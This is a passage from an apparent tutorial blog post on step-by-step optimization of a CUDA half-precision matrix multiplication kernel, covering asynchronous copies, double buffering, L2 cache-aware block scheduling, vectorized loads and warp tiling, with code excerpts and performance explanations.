    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-comment">// Initial setup and declarations, same as naive kernel</span>
    <span class="hljs-comment">// ...</span>
    <span class="hljs-keyword">int</span> s_a_base_addr = __cvta_generic_to_shared(s_a[<span class="hljs-number">0</span>]);
    <span class="hljs-keyword">int</span> s_b_base_addr = __cvta_generic_to_shared(s_b[<span class="hljs-number">0</span>]);
    <span class="hljs-keyword">int</span> load_a_smem_addr_0 = s_a_base_addr + OFFSET(load_a_smem_m, load_a_smem_k, BK + APAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_a_smem_addr_1 = load_a_smem_addr_0 + (BK + APAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_0 = s_b_base_addr + OFFSET(load_b_smem_k, load_b_smem_n, BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_1 = load_b_smem_addr_0 + (BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_2 = load_b_smem_addr_0 + <span class="hljs-number">2</span> * (BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_3 = load_b_smem_addr_0 + <span class="hljs-number">3</span> * (BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">0</span>; bk &lt; K / BK; bk++) {
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr +     K]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr +     N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_2), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">2</span> * N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_3), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">3</span> * N]));

        load_a_gmem_addr += BK;
        load_b_gmem_addr += BK * N;

        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.commit_group;\n"</span> ::);
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.wait_group 0;\n"</span> ::);

        __syncthreads();

        <span class="hljs-comment">// Matrix loading and multiplication code remains the same as last one</span>
        <span class="hljs-comment">// ...</span>
    }
}
</code></pre>
<p>Instead of using the FLOAT4 macro to load data, we now use the <code>cp.async.ca.shared.global</code> PTX instruction. This instruction initiates asynchronous memory transfers from global memory to shared memory. The transfers are grouped with <code>cp.async.commit_group</code> and then we wait for completion with <code>cp.async.wait_group 0</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744355523915/d997140b-f27c-4092-a9cc-be173a5e5284.png" alt class="image--center mx-auto" /></p>
<p>The implementation of asynchronous memory transfers alters the data movement pipeline in the GPU by using hardware support available in Ampere and later architectures. The <code>cp.async.ca.shared.global</code> PTX instruction copies data from global memory to shared memory without staging it in registers first. Removing that intermediate register footprint frees registers for computation and lets the copy proceed while the thread keeps executing other instructions.</p>
<p>The async copy operations are ordered only through explicit synchronization primitives. The <code>cp.async.commit_group</code> instruction bundles the copies a thread has issued so far into a group that can be tracked collectively. The <code>cp.async.wait_group 0</code> instruction is the strictest synchronization point: it stalls the thread until no committed group is still pending, that is, until every committed group has completed. This ensures correct access ordering, but waiting right after issuing the copies doesn't permit significant asynchronous overlap in this implementation.</p>
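<p>The difference between waiting for everything and leaving groups in flight is easier to see in a toy model. The C++ sketch below is host-side bookkeeping only, not a description of how the hardware is implemented: <code>CopyGroupTracker</code> is a hypothetical class that just counts committed groups and assumes they retire in order.</p>
<pre><code class="lang-cpp">#include &lt;cassert&gt;

// Toy model of cp.async group bookkeeping for a single thread.
class CopyGroupTracker {
public:
    // Models cp.async.commit_group: the copies issued so far become one group.
    void commit_group() { ++pending_; }

    // Models cp.async.wait_group n: block until at most n of the most recently
    // committed groups are still pending. Returns how many groups had to finish.
    int wait_group(int n) {
        assert(n &gt;= 0);
        int retired = 0;
        while (pending_ &gt; n) {
            --pending_;
            ++retired;
        }
        return retired;
    }

    int pending() const { return pending_; }

private:
    int pending_ = 0;
};
</code></pre>
<p>Calling <code>wait_group(0)</code> right after every commit always drains the tracker to zero before any compute starts, which is the situation in <code>hgemm_async</code>. A pipelined kernel could instead commit the next tile first and then call <code>wait_group(1)</code>, leaving one group in flight while it computes.</p>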
<p>Each thread issues fixed-width 16-byte transfers (8 half-precision elements) through the async copy instructions. With 256 threads, each <code>cp.async</code> issued across the block moves 4 KB. When adjacent threads request adjacent 16-byte chunks, the memory system coalesces them into larger transactions, reducing the number of actual DRAM operations required.</p>
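<p>The per-iteration traffic can be checked with a few lines of host-side C++. This is a back-of-the-envelope sketch: <code>copies_per_thread</code> and <code>bytes_per_wave</code> are made-up helpers, and the code assumes the tile divides evenly into 16-byte chunks across the block.</p>
<pre><code class="lang-cpp">#include &lt;cassert&gt;

constexpr int kCopyBytes = 16;  // size of one cp.async transfer
constexpr int kHalfBytes = 2;   // sizeof(half)

// How many 16-byte cp.async copies each thread must issue to move a
// rows x cols tile of halves with `threads` threads in the block.
int copies_per_thread(int rows, int cols, int threads) {
    const int tile_bytes = rows * cols * kHalfBytes;
    assert(tile_bytes % (kCopyBytes * threads) == 0);
    return tile_bytes / (kCopyBytes * threads);
}

// Bytes moved when every thread in the block issues one copy.
int bytes_per_wave(int threads) { return threads * kCopyBytes; }
</code></pre>
<p>With BM = 64, BN = 128, BK = 64 and 256 threads this gives 2 copies per thread for the A tile and 4 for the B tile, matching the six <code>cp.async</code> instructions in the loop above, for 24 KB moved per iteration.</p>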
<p>The "ca" (cache all) hint in <code>cp.async.ca.shared.global</code> indicates that data should be cached at all applicable levels of the memory hierarchy. This maximizes temporal locality benefits for this data pattern which features repeated access to the same memory regions across thread blocks.</p>
<h2 id="heading-double-buffering">Double Buffering</h2>
<p>The next optimization implements double buffering, a classical software pipelining technique, to overlap computation with memory transfers more effectively. By maintaining two buffers in shared memory for each input matrix, the kernel can compute on data from one buffer while loading the next iteration's data into the alternate buffer. This effectively creates a two-stage pipeline where memory operations and computations occur in parallel.</p>
<p>The core idea is to use two separate buffers for the input matrices, alternating between them for loading and computing. The key change here is the use of dynamic shared memory with <code>extern __shared__ half smem[];</code>. We partition this memory to create two buffers each for matrices A and B. The offset variables <code>s_a_db_offset</code> and <code>s_b_db_offset</code> will be used to select the appropriate buffer.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_doublebuff</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-comment">// similar initial setup as last one</span>
    <span class="hljs-comment">// ...</span>
    <span class="hljs-keyword">extern</span> __shared__ half smem[];
    half *s_a = smem;
    half *s_b = smem + <span class="hljs-number">2</span> * BM * (BK + APAD);
    <span class="hljs-keyword">int</span> s_a_db_offset = BM * (BK + APAD);
    <span class="hljs-keyword">int</span> s_b_db_offset = BK * (BN + BPAD);

    <span class="hljs-comment">// initial load into first buffer</span>
    {
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr +     K]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr +     N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_2), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">2</span> * N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_3), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">3</span> * N]));

        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.commit_group;\n"</span> ::);
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.wait_group 0;\n"</span> ::);
        __syncthreads();
    }

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">1</span>; bk &lt; K / BK; bk++) {
        <span class="hljs-keyword">int</span> smem_sel = (bk &amp; <span class="hljs-number">1</span>) ^ <span class="hljs-number">1</span>;
        <span class="hljs-keyword">int</span> smem_sel_next = ((bk - <span class="hljs-number">1</span>) &amp; <span class="hljs-number">1</span>) ^ <span class="hljs-number">1</span>;

        load_a_gmem_addr += BK;
        load_b_gmem_addr += BK * N;

        <span class="hljs-comment">// load next iteration's data into alternate buffer</span>
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_0 + smem_sel_next * s_a_db_offset * (<span class="hljs-keyword">int</span>)<span class="hljs-keyword">sizeof</span>(half)), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_1 + smem_sel_next * s_a_db_offset * (<span class="hljs-keyword">int</span>)<span class="hljs-keyword">sizeof</span>(half)), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr +     K]));
        <span class="hljs-comment">// ... more async copy instructions for the next buffer</span>

        <span class="hljs-comment">// compute using the current buffer</span>
        wmma::load_matrix_sync(frag_a[<span class="hljs-number">0</span>][<span class="hljs-number">0</span>], &amp;s_a[smem_sel * s_a_db_offset + (comp_c_frag_m * <span class="hljs-number">64</span>     ) * (BK + APAD) +  <span class="hljs-number">0</span>], BK + APAD);
        wmma::load_matrix_sync(frag_a[<span class="hljs-number">0</span>][<span class="hljs-number">1</span>], &amp;s_a[smem_sel * s_a_db_offset + (comp_c_frag_m * <span class="hljs-number">64</span> + <span class="hljs-number">16</span>) * (BK + APAD) +  <span class="hljs-number">0</span>], BK + APAD);
        <span class="hljs-comment">// ... more Tensor Core load operations</span>

        <span class="hljs-comment">// matrix multiply operations</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
            <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">4</span>; j++) {
                wmma::mma_sync(frag_c[i][j], frag_a[<span class="hljs-number">0</span>][i], frag_b[<span class="hljs-number">0</span>][j], frag_c[i][j]);
                wmma::mma_sync(frag_c[i][j], frag_a[<span class="hljs-number">1</span>][i], frag_b[<span class="hljs-number">1</span>][j], frag_c[i][j]);
            }
        }

        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.commit_group;\n"</span> ::);
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.wait_group 0;\n"</span> ::);
        __syncthreads();
    }

    <span class="hljs-comment">// Process final buffer</span>
    <span class="hljs-comment">// ...</span>
}
</code></pre>
<p>The main computation loop now includes buffer selection logic. The variables <code>smem_sel</code> and <code>smem_sel_next</code> toggle between 0 and 1 to select the appropriate buffer for the current and next iterations. While we're computing using the current buffer (<code>smem_sel</code>), we're loading data into the next buffer (<code>smem_sel_next</code>).</p>
<p>The implementation uses dynamic shared memory (<code>extern __shared__ half smem[]</code>) to accommodate twice the storage required for each matrix tile. The total shared memory consumption is <code>2 * (BM * (BK + APAD) + BK * (BN + BPAD)) * sizeof(half)</code>, which comes to 54,272 bytes (about 53 KB) with the tile sizes used at launch (BM=128, BN=256, BK=32, and 8 elements of padding), and <a target="_blank" href="https://forums.developer.nvidia.com/t/question-about-max-shared-memory-in-block-and-multiprocessor/283345">exceeds the default 48 KB shared memory limit per thread block</a>. To enable this larger allocation, the kernel launch requires <code>cudaFuncSetAttribute(kernel, cudaFuncAttributeMaxDynamicSharedMemorySize, 98304)</code>, which raises the cap to 96 KB.</p>
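<p>As a quick sanity check on the shared memory budget, here is a minimal host-side sketch of the size arithmetic. It assumes the tile sizes from the launch code (BM=128, BN=256, BK=32) and that <code>APAD</code> and <code>BPAD</code> are both 8, as the <code>+ 8</code> terms in the launch code suggest; <code>smem_bytes</code> and <code>kHalfBytes</code> are hypothetical names used only for illustration.</p>

```cpp
#include <cassert>
#include <cstddef>

// Tile sizes taken from the launch code. APAD = BPAD = 8 is an assumption
// based on the "+ 8" terms used when computing dsmem.
constexpr std::size_t BM = 128, BN = 256, BK = 32;
constexpr std::size_t APAD = 8, BPAD = 8;
constexpr std::size_t kHalfBytes = 2;  // sizeof(half) on the device

// Bytes of dynamic shared memory needed for `stages` copies of the
// padded A tile (BM x (BK + APAD)) and B tile (BK x (BN + BPAD)).
constexpr std::size_t smem_bytes(std::size_t stages) {
    return stages * (BM * (BK + APAD) + BK * (BN + BPAD)) * kHalfBytes;
}

static_assert(smem_bytes(1) == 27136, "single-buffered tiles");
static_assert(smem_bytes(2) == 54272, "double-buffered tiles");
static_assert(smem_bytes(2) > 48 * 1024, "above the default 48 KB limit");
static_assert(smem_bytes(2) <= 98304, "within the 98304-byte opt-in");
```

<p>Under these assumptions a single-buffered kernel fits in the default limit, while the double-buffered one needs the opt-in attribute.</p>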
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744355295837/f3973f24-892c-4c0b-b0b1-b1710fe05683.png" alt class="image--center mx-auto" /></p>
<p>The buffer management logic employs a clever bit manipulation technique to toggle between the buffers. The expressions <code>(bk &amp; 1) ^ 1</code> and <code>((bk - 1) &amp; 1) ^ 1</code> alternate between 0 and 1 on consecutive iterations, providing the offset multipliers for addressing the appropriate buffer. This technique avoids branching and ensures deterministic access patterns.</p>
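<p>To see the toggle in action, the two expressions can be evaluated on the host. This is only a sketch: <code>select_buffers</code> is a hypothetical helper, not part of the kernel, and it simply reuses the kernel's expressions for loop iterations starting at <code>bk = 1</code>.</p>

```cpp
#include <cassert>
#include <utility>

// Returns {compute_buffer, load_buffer} for loop iteration bk (bk >= 1),
// using the same bit expressions as the kernel's main loop.
inline std::pair<int, int> select_buffers(int bk) {
    assert(bk >= 1);
    int smem_sel = (bk & 1) ^ 1;             // buffer used for the WMMA loads
    int smem_sel_next = ((bk - 1) & 1) ^ 1;  // buffer receiving the next tile
    return {smem_sel, smem_sel_next};
}
```

<p>For <code>bk = 1</code> this yields compute buffer 0 and load buffer 1 (the initial load went into buffer 0), and the roles swap on every following iteration, so the two indices are never equal.</p>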
<p>From a performance modeling perspective, double buffering transforms the execution time from a sequential model <code>T_total = T_memory + T_compute</code> to an overlapped model <code>T_total = max(T_memory, T_compute) + T_setup</code>, where <code>T_setup</code> represents the initial loading phase. This optimization is particularly effective when <code>T_memory</code> and <code>T_compute</code> are similar in magnitude, which is often the case in matrix multiplication operations at this scale.</p>
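<p>The model can be made concrete with a toy calculation. The sketch below extends the per-step formula to a whole loop of <code>iters</code> tiles, which is my own simplifying assumption: one exposed initial load, then <code>iters - 1</code> overlapped steps, then a final compute on the last buffer. The function names and the unit costs are hypothetical.</p>

```cpp
#include <algorithm>
#include <cassert>

// Sequential model: every tile pays for its load and then its compute.
inline double sequential_time(int iters, double t_memory, double t_compute) {
    return iters * (t_memory + t_compute);
}

// Overlapped model (assumed pipeline shape): the first load is exposed,
// the next (iters - 1) steps cost max(load, compute), and the last tile
// still needs one compute step with nothing left to load.
inline double overlapped_time(int iters, double t_memory, double t_compute) {
    assert(iters >= 1);
    return t_memory + (iters - 1) * std::max(t_memory, t_compute) + t_compute;
}
```

<p>With <code>K / BK = 512</code> iterations and equal unit costs for load and compute, the sequential model gives 1024 units and the overlapped one 513, which is where the "close to 2x when the two costs are balanced" intuition comes from. When one cost dominates, the gain shrinks toward nothing.</p>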
<h2 id="heading-cache-locality">Cache Locality</h2>
<p>The next optimization aims to improve locality in the L2 cache by changing how thread blocks are scheduled. This modification is particularly significant for large matrix dimensions:</p>
<pre><code class="lang-cpp"><span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_localcache</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-comment">// ... (most of the code is same as before)</span>
    <span class="hljs-comment">// int bx = blockIdx.x; // Original</span>
    <span class="hljs-keyword">int</span> bx = blockIdx.z * gridDim.x + blockIdx.x; <span class="hljs-comment">// New version</span>
    <span class="hljs-keyword">if</span> (bx &gt;= N / BN || by &gt;= M / BM)
        <span class="hljs-keyword">return</span>;
    <span class="hljs-comment">// ... (rest of the kernel remains the same)</span>
}
</code></pre>
<p>And when launching the kernel:</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BM = <span class="hljs-number">128</span>, BN = <span class="hljs-number">256</span>, BK = <span class="hljs-number">32</span>;
<span class="hljs-function">dim3 <span class="hljs-title">blockDim</span><span class="hljs-params">(<span class="hljs-number">256</span>)</span></span>;
<span class="hljs-keyword">int</span> BX = (N + BN - <span class="hljs-number">1</span>) / BN;
<span class="hljs-keyword">int</span> BY = (M + BM - <span class="hljs-number">1</span>) / BM;
<span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> NSPLIT = <span class="hljs-number">4096</span>;
<span class="hljs-keyword">int</span> split_num = (N + NSPLIT - <span class="hljs-number">1</span>) / NSPLIT;
<span class="hljs-function">dim3 <span class="hljs-title">gridDim</span><span class="hljs-params">((BX + split_num - <span class="hljs-number">1</span>) / split_num, BY, split_num)</span></span>;
cudaFuncSetAttribute(hgemm_localcache, cudaFuncAttributeMaxDynamicSharedMemorySize, <span class="hljs-number">98304</span>);
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> dsmem = <span class="hljs-number">2</span> * (BM * (BK + <span class="hljs-number">8</span>) + BK * (BN + <span class="hljs-number">8</span>)) * <span class="hljs-keyword">sizeof</span>(half);
hgemm_localcache&lt;&lt;&lt;gridDim, blockDim, dsmem&gt;&gt;&gt;(a, b, c, M, N, K);
</code></pre>
<p>This modification changes the order in which thread blocks are scheduled, promoting better locality for matrices A and B in the L2 cache. It addresses a fundamental scheduling challenge in massively parallel matrix multiplication. In practice, the GPU dispatches the thread blocks of a grid by incrementing the x-dimension first, then y, and finally z (CUDA doesn't formally guarantee this order, but it is the commonly observed behavior). This pattern works well for matrix A's spatial locality but leads to poor locality for matrix B when processing large matrices.</p>
<p>Consider a large matrix multiplication where C(16384×16384) = A(16384×16384) × B(16384×16384). With BM=128 and BN=256, the output matrix C is divided into a 128×64 grid of tiles (128 tile rows by 64 tile columns, each tile being 128×256 elements). Traditional scheduling would process all the tiles in the first row of C (accessing corresponding rows of A and columns of B), then move to the second row, and so on. While this maintains good spatial locality for A (we reuse the same rows), we rapidly traverse different columns of B, leading to cache thrashing.</p>
<p>The modified scheduling introduces a parameter NSPLIT that changes how tiles are processed. Instead of traversing all N columns before moving to the next row, we process only NSPLIT/BN tile columns (16 with NSPLIT=4096 and BN=256) for each row of tiles before moving to the next row. This creates a more balanced access pattern that improves the spatial and temporal locality for both input matrices.</p>
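<p>The remapping is easier to follow with the numbers plugged in. The following host-side sketch mirrors the launch arithmetic and the kernel's <code>bx</code> computation; <code>Grid</code>, <code>make_grid</code> and <code>tile_column</code> are hypothetical names introduced for illustration only.</p>

```cpp
#include <cassert>

struct Grid { int x, y, z; };

// Host-side copy of the launch arithmetic: the tile columns are split
// into split_num slabs along gridDim.z.
inline Grid make_grid(int M, int N, int BM, int BN, int NSPLIT) {
    assert(BM > 0 && BN > 0 && NSPLIT > 0);
    int BX = (N + BN - 1) / BN;                 // tile columns in C
    int BY = (M + BM - 1) / BM;                 // tile rows in C
    int split_num = (N + NSPLIT - 1) / NSPLIT;  // number of column slabs
    return {(BX + split_num - 1) / split_num, BY, split_num};
}

// Tile column a block works on, as computed inside the kernel:
// bx = blockIdx.z * gridDim.x + blockIdx.x.
inline int tile_column(int block_x, int block_z, int grid_x) {
    return block_z * grid_x + block_x;
}
```

<p>For M = N = 16384 this gives a 16 × 128 × 4 grid: within one z-slab the blocks sweep only 16 tile columns per tile row, so the same 4096 columns of B stay hot in L2 while all 128 tile rows pass over them, and only then does the next slab begin.</p>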
<p>The optimal value for NSPLIT depends on hardware characteristics, particularly L2 cache size and matrix dimensions. Through empirical testing, NSPLIT=4096 was found to provide the best performance, likely because it balances the working set size to fit optimally in the L2 cache while maintaining sufficient parallelism.</p>
<p>This optimization is particularly effective for large matrices (approaching or exceeding 16384×16384 dimensions) where L2 cache misses become a significant performance bottleneck. For smaller matrices, the benefit is less pronounced as the working set already fits well in the cache hierarchy.</p>
<h2 id="heading-vectorized-memory-access">Vectorized Memory Access</h2>
<p>Next, we'll tackle two optimizations: transposing matrix A in shared memory to enable auto-vectorization of SMEM loads, and vectorizing all global memory accesses using explicit vector datatypes. First, let's look at the transposition of matrix A. By transposing A in shared memory, we can load data using vectorized SMEM loads (LDS.128 in SASS), which provides better memory access performance:</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Transpose A during the GMEM to SMEM transfer</span>
float4 tmp = <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;A[innerRowA * K + innerColA * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">0</span>) * BM + innerRowA] = tmp.x;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">1</span>) * BM + innerRowA] = tmp.y;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">2</span>) * BM + innerRowA] = tmp.z;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">3</span>) * BM + innerRowA] = tmp.w;

<span class="hljs-comment">// B doesn't need to be transposed, just vectorize the access</span>
<span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;Bs[innerRowB * BN + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>] = 
    <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;B[innerRowB * N + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];
</code></pre>
<p>Looking at the assembly, we see that loading A into the registers, which used to be a 32b LDS load, is now also a 128b LDS.128 load, just like it had already been for B. This gives us approximately a 3% performance improvement.</p>
<p>Next, we vectorize all loads and stores from/to global memory using vector datatypes, specifically float4:</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Vectorized load from global memory using float4</span>
float4 tmp = <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;A[innerRowA * K + innerColA * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];

<span class="hljs-comment">// We transpose A during the transfer from global to shared memory</span>
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">0</span>) * BM + innerRowA] = tmp.x;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">1</span>) * BM + innerRowA] = tmp.y;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">2</span>) * BM + innerRowA] = tmp.z;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">3</span>) * BM + innerRowA] = tmp.w;

<span class="hljs-comment">// Vectorized load and store for matrix B</span>
<span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;Bs[innerRowB * BN + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>] = 
    <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;B[innerRowB * N + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];
</code></pre>
<p>This leads to the 32b global memory load instructions (LDG.E) being replaced with 128b counterparts (LDG.E.128). Similarly, store operations also get vectorized.</p>
<p>The <code>reinterpret_cast</code> promises the compiler that the <code>float*</code> pointers are 128b aligned, which is a requirement for using LDG.E.128. Manually unrolling the four accesses doesn't achieve the same thing: without that promise the compiler can't assume alignment, so it has to fall back to 32b loads.</p>
<h2 id="heading-warp-level-computation">Warp-Level Computation</h2>
<p>Our final optimization focuses on warptiling, which adds another level of hierarchy between blocktiling and threadtiling. While blocks and threads are explicit in CUDA, warps are an implicit hardware concept. A warp consists of 32 threads with consecutive thread IDs that execute in lockstep.</p>
<p>Warptiling explicitly organizes computation around the warp structure, aligning better with the GPU's execution model:</p>
<pre><code class="lang-cpp">__shared__ half s_a[BK][BK + BPAD];
__shared__ half s_b[BK][BN + BPAD];

<span class="hljs-comment">// Fragments: 3×2 grid per warp</span>
<span class="hljs-keyword">using</span> <span class="hljs-keyword">namespace</span> nvcuda::wmma;
fragment&lt;matrix_a, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, row_major&gt; frag_a;
fragment&lt;matrix_b, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, row_major&gt; frag_b;
fragment&lt;accumulator,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half&gt; frag_c[<span class="hljs-number">3</span>][<span class="hljs-number">2</span>];

<span class="hljs-comment">// Zero out all accumulator fragments</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
        fill_fragment(frag_c[i][j], <span class="hljs-number">0.0f</span>);
    }
}

<span class="hljs-comment">// Compute thread-specific load offsets (example values shown)</span>
<span class="hljs-keyword">int</span> load_a_smem_m = (tid % <span class="hljs-number">16</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// A: row offset in shared memory</span>
<span class="hljs-keyword">int</span> load_a_smem_k = (tid / <span class="hljs-number">16</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// A: col offset</span>
<span class="hljs-keyword">int</span> load_b_smem_k = (tid / <span class="hljs-number">32</span>) * <span class="hljs-number">8</span>; <span class="hljs-comment">// B: row offset in shared mem</span>
<span class="hljs-keyword">int</span> load_b_smem_n = (tid % <span class="hljs-number">32</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// B: col offset</span>
<span class="hljs-keyword">int</span> load_a_gmem_m = by * BM + load_a_smem_m;
<span class="hljs-keyword">int</span> load_b_gmem_n = bx * BN + load_b_smem_n;
<span class="hljs-comment">// (compute addresses in global memory for A and B here...)</span>
<span class="hljs-comment">// For brevity, assume we compute load_a_gmem_addr and load_b_gmem_addr properly</span>
